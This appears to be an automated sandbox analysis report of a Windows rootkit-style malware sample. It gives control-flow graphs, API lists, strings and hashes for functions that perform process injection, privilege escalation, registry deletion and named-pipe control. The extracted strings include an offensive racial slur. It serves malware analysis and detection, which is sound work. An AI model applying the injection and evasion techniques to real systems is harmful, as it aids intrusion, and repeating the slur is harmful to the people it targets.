                                                                                                                                  control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001d62-140001d7e 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 1400019b6-1400019b9 58->59 60 140001966-14000197b K32GetProcessImageFileNameW 58->60 63 140001a95-140001ab4 NtQueryInformationProcess 59->63 64 1400019bf-140001a6d 59->64 61 1400019ad-1400019b0 CloseHandle 60->61 62 14000197d-140001998 PathFindFileNameW lstrlenW 60->62 61->59 62->61 67 14000199a-1400019aa StrCpyW 62->67 65 140001d59-140001d5c CloseHandle 63->65 66 140001aba-140001abe 63->66 68 140001a71-140001a83 StrCmpIW 64->68 65->46 66->65 70 140001ac4-140001adc OpenProcessToken 66->70 67->61 68->65 69 140001a89-140001a93 68->69 69->63 69->68 70->65 71 140001ae2-140001b08 GetTokenInformation 70->71 72 140001b85 71->72 73 140001b0a-140001b13 GetLastError 71->73 75 140001b8c-140001b9a CloseHandle 72->75 73->72 74 140001b15-140001b29 LocalAlloc 73->74 74->72 76 140001b2b-140001b51 GetTokenInformation 74->76 75->65 77 140001ba0-140001ba7 75->77 78 140001b73 76->78 79 140001b53-140001b71 GetSidSubAuthorityCount GetSidSubAuthority 76->79 77->65 80 140001bad-140001bb8 77->80 81 140001b7a-140001b83 LocalFree 78->81 79->81 80->65 82 140001bbe-140001bc8 80->82 81->75 83 140001be3 82->83 84 140001bca-140001bd4 82->84 86 140001be7-140001c1f call 140002a34 * 3 83->86 84->65 85 140001bda-140001be1 84->85 85->86 86->65 93 140001c25-140001c44 call 140002a34 StrStrA 86->93 96 140001c46-140001c56 93->96 97 140001c5d-140001c83 call 140002a34 * 2 93->97 96->93 99 140001c58 96->99 97->65 103 140001c89-140001cb2 VirtualAllocEx 97->103 99->65 103->65 104 140001cb8-140001cd1 WriteProcessMemory 103->104 104->65 105 140001cd7-140001cf9 call 140002c8c 104->105 105->65 108 140001cfb-140001d03 105->108 108->65 109 140001d05-140001d12 WaitForSingleObject 108->109 110 140001d14-140001d28 GetExitCodeThread 109->110 111 140001d4e-140001d53 CloseHandle 109->111 112 140001d33-140001d4c VirtualFreeEx 110->112 113 140001d2a-140001d30 110->113 111->65 112->111 113->112
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindImageLastMemoryObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                                                                                  • String ID: $77Sys.exe$$77System.exe$$77ntoskrnl.exe$$77rootkit.exe$$77sys.exe$@$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain$System.exe$nigger.exe$ntoskernel.exe$ntoskrnlroot.exe$rootkit.exe$rootkitlol.exe$svchostsrv.exe$sys.exe
                                                                                                                                  • API String ID: 2895713255-756547507
                                                                                                                                  • Opcode ID: 4ed918a4230b72daca0d9b9d3ed83927a0b08d90c478edfef652fc0b4d0df841
                                                                                                                                  • Instruction ID: b4f10026e7dbec249f39bd8f5073f4e90bda1b014031b33e7746f005ef94ebc4
                                                                                                                                  • Opcode Fuzzy Hash: 4ed918a4230b72daca0d9b9d3ed83927a0b08d90c478edfef652fc0b4d0df841
                                                                                                                                  • Instruction Fuzzy Hash: 0AD116F6600A4186EB26DF23F8903D937A5B789BC4F40412AEB4A57BB5EF38C585C744
                                                                                                                                  Function 0000000140001D80 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4084875642-0
                                                                                                                                  • Opcode ID: a68e9f442f763d15fcbf828a4bdd41b84938c378905df83764973d8e7f96681c
                                                                                                                                  • Instruction ID: 10f202612f1e6d5b25c2a2b6f529799c2360b0dca5b81425742e23b4f8d9878f
                                                                                                                                  • Opcode Fuzzy Hash: a68e9f442f763d15fcbf828a4bdd41b84938c378905df83764973d8e7f96681c
                                                                                                                                  • Instruction Fuzzy Hash: 5B515AB27116808AEB66DF63F8587EA22A1F78DBD4F404125EF4A477A4DF38C586C704
                                                                                                                                  Function 0000000140002390 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3197395349-0
                                                                                                                                  • Opcode ID: 949f16e7d4c180cf813de136aa23d71ac300c489f72f878ece3ea1172fb87a5a
                                                                                                                                  • Instruction ID: 989d2f77f0050e3192d67e688ebe3d96c03aaae47e0f3c15b79fdd16399e6715
                                                                                                                                  • Opcode Fuzzy Hash: 949f16e7d4c180cf813de136aa23d71ac300c489f72f878ece3ea1172fb87a5a
                                                                                                                                  • Instruction Fuzzy Hash: AA3169B2214691CAE761CF25F4807DE7BA4F748798F40422AFB5947EA8DB78C209CB44
                                                                                                                                  Function 0000000140002A9C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                  • String ID: .text$C:\Windows\System32\
                                                                                                                                  • API String ID: 2721474350-832442975
                                                                                                                                  • Opcode ID: 1e07da0921621d3d0947f0c2c8c44ecdff1a4ad4df37a11abb14209e036db73c
                                                                                                                                  • Instruction ID: 5162005ac8c22fef71f76ecc2651d04e2d698091113972baa1bb0e356fae301c
                                                                                                                                  • Opcode Fuzzy Hash: 1e07da0921621d3d0947f0c2c8c44ecdff1a4ad4df37a11abb14209e036db73c
                                                                                                                                  • Instruction Fuzzy Hash: 42517DB270469086EB26DF12F8987DA73A1F78CBD5F444115AF4A03B68DF38D549C704
                                                                                                                                  Function 0000000140003784 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                  • String ID: M$\\.\pipe\$77childproc
                                                                                                                                  • API String ID: 2203880229-1625420002
                                                                                                                                  • Opcode ID: a1333788beb70ef34279765abebea06e3bf6a99c940ab4b4adb7949838a3b605
                                                                                                                                  • Instruction ID: 9f82adc9a2da82afc58c775828db64e338728d842b3173e1d6fe9be184669719
                                                                                                                                  • Opcode Fuzzy Hash: a1333788beb70ef34279765abebea06e3bf6a99c940ab4b4adb7949838a3b605
                                                                                                                                  • Instruction Fuzzy Hash: 4D1115F121868482E716DB22F8143E9A764E78DBE1F548225BB9A476F5CF7CC548C704
                                                                                                                                  Function 0000000140002D40 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 158 140002d40-140002d4a 159 140002d4d-140002d60 call 140002390 158->159 162 140002d62-140002d6b Sleep 159->162 163 140002d6d-140002d7a ConnectNamedPipe 159->163 162->159 164 140002db1-140002db6 Sleep 163->164 165 140002d7c-140002d9d ReadFile 163->165 166 140002dbc-140002dc5 DisconnectNamedPipe 164->166 165->166 167 140002d9f-140002da4 165->167 166->163 167->166 168 140002da6-140002daf 167->168 168->166
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                  • String ID: \\.\pipe\$77control
                                                                                                                                  • API String ID: 2071455217-1133490114
                                                                                                                                  • Opcode ID: 36dc111bbaa2474e07b1118d52b476a4b229aafa6fd9f4c6e11ccae6477e241e
                                                                                                                                  • Instruction ID: 7c3f5ec425dc5f008f2f9d970d4da03b913dd07842e93ae30d277d2745604383
                                                                                                                                  • Opcode Fuzzy Hash: 36dc111bbaa2474e07b1118d52b476a4b229aafa6fd9f4c6e11ccae6477e241e
                                                                                                                                  • Instruction Fuzzy Hash: E3015AB0210600C2EB16DB23F8143EA63A1B79DBE1F544226FB66432F5CF78C848C704
                                                                                                                                  Function 00000001400036C4 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 178 1400036c4-140003718 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 179 14000371a-14000372d K32EnumProcesses 178->179 180 140003777-140003780 SleepEx 179->180 181 14000372f-14000373e 179->181 180->179 182 140003768-140003773 181->182 183 140003740-140003744 181->183 182->180 184 140003746 183->184 185 140003757-14000375a call 140003220 183->185 186 14000374a-14000374f 184->186 189 14000375e 185->189 187 140003751-140003755 186->187 188 140003762-140003766 186->188 187->185 187->186 188->182 188->183 189->188
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3676546796-0
                                                                                                                                  • Opcode ID: 2063ebf49b69ed3c1b9805c902a12b428771fdbf7bbf74ecde5daa0ba9b34b01
                                                                                                                                  • Instruction ID: 22731a8b42674325a47caa94babb191afd8e106128d15b43582e5fd179edb77c
                                                                                                                                  • Opcode Fuzzy Hash: 2063ebf49b69ed3c1b9805c902a12b428771fdbf7bbf74ecde5daa0ba9b34b01
                                                                                                                                  • Instruction Fuzzy Hash: BE116DF270465186E72ADB27F8547AA76A6F789FC1F554028EB4607B78CF39D880CB40
                                                                                                                                  Function 000000014000209C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1323846700-0
                                                                                                                                  • Opcode ID: 1b8020be0153ac8c4c871f4fed511265f4a549556a39957e5e637fb536768786
                                                                                                                                  • Instruction ID: ef2f834ef75e5b790356348e68605b6cc29ab2bdc5fc913e3c420dca79cf92ea
                                                                                                                                  • Opcode Fuzzy Hash: 1b8020be0153ac8c4c871f4fed511265f4a549556a39957e5e637fb536768786
                                                                                                                                  • Instruction Fuzzy Hash: 79115EB1B05A4086EB16DF27F8443D967A1AB9DBC4F488024FF0903776EE38C5868704
                                                                                                                                  Function 00000290EDD0F358 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 202 290edd0f358-290edd0f373 203 290edd0f376-290edd0f39f 202->203 204 290edd0f3a1-290edd0f3a6 203->204 205 290edd0f3ab-290edd0f3b4 203->205 206 290edd0f436-290edd0f43f 204->206 207 290edd0f3b6-290edd0f3b9 205->207 208 290edd0f3cc 205->208 206->203 209 290edd0f445-290edd0f45f 206->209 210 290edd0f3c5-290edd0f3ca 207->210 211 290edd0f3bb-290edd0f3c3 207->211 212 290edd0f3d1-290edd0f3e2 GetStdHandle 208->212 210->212 211->212 213 290edd0f411-290edd0f429 212->213 214 290edd0f3e4-290edd0f3ef GetFileType 212->214 213->206 215 290edd0f42b-290edd0f42f 213->215 214->213 216 290edd0f3f1-290edd0f3fc 214->216 215->206 217 290edd0f405-290edd0f408 216->217 218 290edd0f3fe-290edd0f403 216->218 217->206 219 290edd0f40a-290edd0f40f 217->219 218->206 219->206
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleType
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                  • Opcode ID: a864622e814d0c676a636131f9f06b8113cf47aa5893946a4f8a8d78e681d1d2
                                                                                                                                  • Instruction ID: d9c6dbd26d9c929a836c36f306744989a70f434378b685db5c14b089fef93e2f
                                                                                                                                  • Opcode Fuzzy Hash: a864622e814d0c676a636131f9f06b8113cf47aa5893946a4f8a8d78e681d1d2
                                                                                                                                  • Instruction Fuzzy Hash: 8B31E822A18B4D96E7608B2595C83697655FB85BB0F791B09DFEA073E0CB34D4A1C300
                                                                                                                                  Function 00000290EDB02C8C Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction ID: 4fdde6dd451327623d40f7483815b36331a2f6b417c54a79c6c642078b11d019
                                                                                                                                  • Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction Fuzzy Hash: 62912A7AB01158CBDB648F25D288B6EB393FF54BD8F5485349F890BB88EA34D816C710
                                                                                                                                  Function 0000000140002DC8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 220 140002dc8-140002dcc call 140002ddc 222 140002dd1-140002dd3 ExitProcess 220->222
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0000000140002DDC: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E04
                                                                                                                                    • Part of subcall function 0000000140002DDC: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E14
                                                                                                                                    • Part of subcall function 0000000140002DDC: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E2E
                                                                                                                                    • Part of subcall function 0000000140002DDC: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002E45
                                                                                                                                    • Part of subcall function 0000000140002DDC: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E7D
                                                                                                                                    • Part of subcall function 0000000140002DDC: GetLastError.KERNEL32 ref: 0000000140002E87
                                                                                                                                    • Part of subcall function 0000000140002DDC: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E90
                                                                                                                                    • Part of subcall function 0000000140002DDC: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002EB9
                                                                                                                                    • Part of subcall function 0000000140002DDC: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002EE9
                                                                                                                                    • Part of subcall function 0000000140002DDC: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F19
                                                                                                                                    • Part of subcall function 0000000140002DDC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F2D
                                                                                                                                    • Part of subcall function 0000000140002DDC: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F3B
                                                                                                                                    • Part of subcall function 0000000140002DDC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F4E
                                                                                                                                    • Part of subcall function 0000000140002DDC: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F5C
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0000000140002DD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2472495637-0
                                                                                                                                  • Opcode ID: 4e5166c27edff44e2511a71d21a686f8aa291c754b9d550bcaef5bcd3ab9f41f
                                                                                                                                  • Instruction ID: 09ff1b9b0b6de5b1d9dbee08bd3359a49ea0c6279bea98f9fafefd03efbcb20f
                                                                                                                                  • Opcode Fuzzy Hash: 4e5166c27edff44e2511a71d21a686f8aa291c754b9d550bcaef5bcd3ab9f41f
                                                                                                                                  • Instruction Fuzzy Hash: 91A002F0F2194486EB4AB7B7B85A3DC21B59BACB81F110416B206472B3DE3C48D68759

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 0000000140003260 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 331 140003260-140003281 332 140003287 331->332 333 140003479-14000347f 331->333 334 1400033e7-14000341f GetProcessHeap HeapAlloc K32EnumProcesses 332->334 335 14000328d-140003293 332->335 336 1400035f5-140003619 ReadFile 333->336 337 140003485-140003488 333->337 340 1400036ae-1400036c0 334->340 344 140003425-140003436 334->344 338 140003299-14000329c 335->338 339 1400033de-1400033e0 ExitProcess 335->339 336->340 341 14000361f-140003626 336->341 342 1400035eb-1400035f0 call 14000200c 337->342 343 14000348e-140003494 337->343 346 1400032a2-1400032a5 338->346 347 140003346-140003371 RegOpenKeyExW 338->347 341->340 348 14000362c-140003667 GetProcessHeap HeapAlloc call 140001d80 341->348 342->340 349 14000349a-14000349d 343->349 350 140003590-1400035a3 call 14000218c 343->350 344->340 351 14000343c-140003472 call 140001868 * 2 344->351 353 140003337-140003341 346->353 354 1400032ab-1400032ae 346->354 359 140003373-1400033a9 RegDeleteValueW * 3 347->359 360 1400033af-1400033d9 call 14000220c * 2 call 14000200c call 1400017a8 call 14000209c 347->360 374 140003669-14000366f 348->374 375 14000369a-1400036a8 GetProcessHeap HeapFree 348->375 356 1400034dc-1400034ed call 14000218c 349->356 357 14000349f-1400034a5 349->357 350->340 377 1400035a9-1400035b8 call 14000218c 350->377 386 140003474 351->386 353->340 364 14000332a-140003332 354->364 365 1400032b0-1400032b6 354->365 356->340 378 1400034f3-140003515 ReadFile 356->378 357->340 367 1400034ab-1400034d5 call 140002cec call 140002d18 ExitProcess 357->367 359->360 360->340 364->340 365->340 373 1400032bc-1400032e0 ReadFile 365->373 373->340 381 1400032e6-1400032ed 373->381 374->375 382 140003671-140003683 374->382 375->340 377->340 399 1400035be-1400035e6 ShellExecuteW 377->399 378->340 385 14000351b-140003522 378->385 381->340 388 1400032f3-140003325 call 140001868 * 2 381->388 389 140003685-140003687 382->389 390 140003689-140003691 382->390 385->340 393 140003528-140003566 GetProcessHeap HeapAlloc ReadFile 385->393 386->340 388->340 389->390 396 140003695 call 140001f7c 389->396 390->382 397 140003693 390->397 393->375 400 14000356c-140003578 393->400 396->375 397->375 399->340 400->375 404 14000357e-14000358b call 1400024c4 400->404 404->375
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeImageLastPathProcessesQueryReadWow64lstrlen
                                                                                                                                  • String ID: $77dll32$$77dll64$$77stager$$77svc32$$77svc64$SOFTWARE$open
                                                                                                                                  • API String ID: 2769840798-3060126615
                                                                                                                                  • Opcode ID: 29c153e1715fe07f47105540688353f685aa26b59e035f4fd9df2addc5bbf680
                                                                                                                                  • Instruction ID: c7823c3da21ac714639afdafe330c24a46c95b71a711037eec7bf8ea8e14e205
                                                                                                                                  • Opcode Fuzzy Hash: 29c153e1715fe07f47105540688353f685aa26b59e035f4fd9df2addc5bbf680
                                                                                                                                  • Instruction Fuzzy Hash: 8FB118F1214A8196EB7BDF27F8543E923A9F7897C4F408116BB0A47AB9DF398605C701
                                                                                                                                  Function 00000001400024C4 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
